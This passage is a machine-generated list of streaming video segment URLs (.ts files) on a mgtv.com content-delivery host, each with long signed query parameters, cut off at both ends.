.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F07F06180FD7C8047E749290FF6287D1_1000080_1010080_938_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A
2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/2B0544D8277741F37443E078D61F8D42_1010080_1020080_1634_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0B1F1DF109541F06CC5D0AB72A2E07E6_1020080_1030080_1527_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/95988C3D60046E864AA28CA3B89B678C_1030080_1040080_1396_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7
OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/FE1D3CC96FC3B6A2AF87888A57C83124_1040080_1050080_638_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/FBA1AF353EFB65306C0B81488859BB7C_1050080_1060080_418_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv
.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/3993C517F5FC78C632B480BA20D5766A_1060080_1070080_749_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E658826568E2BCB5630C621907E0C8D5_1070080_1080080_1635_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/2DB356703E4112220EDCDF73D6278550_1080080_1090080_1121_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_Qy
W9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/654EAE4792CCA9FEBCBF8E0CE1C76D5D_1090080_1100080_1073_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/086750134CA3EFDDF6E67D9B8CDB4B0A_1100080_1110080_2118_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3"
,"https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/8288888D2FCDD0F09F13BBF0BFB04398_1110080_1120080_993_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/8FB853A57436E56FC72C41CBA7D8F844_1120080_1130080_974_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/98AC47F7863C80842B92492BE4BAEAF9_1130080_1140080_442_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW
4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/BA7702EB1CB45FCA0AF051436F286D99_1140080_1150080_1644_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C54D3440943072B6303E863D9757DB35_1150080_1160080_838_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4
vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0BB6A5CAD685D0668D8B3F2F48C53EF3_1160080_1170080_845_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/53167AB96A9BD8BD2E8F36AE957B947F_1170080_1180080_657_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/9A3A90A055F53DE3AFF3F680EC197453_1180080_1190080_520_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a
9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/BF547984B223801425AEC11BADA7C107_1190080_1200080_669_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/06EB79EAAA44B1F035418CA50BE93E55_1200080_1210080_652_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7Jz
